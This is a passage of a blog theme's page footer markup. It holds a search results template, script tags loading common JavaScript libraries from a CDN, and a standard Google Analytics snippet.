pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-F705DSGLHW"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-F705DSGLHW'); }); </script>
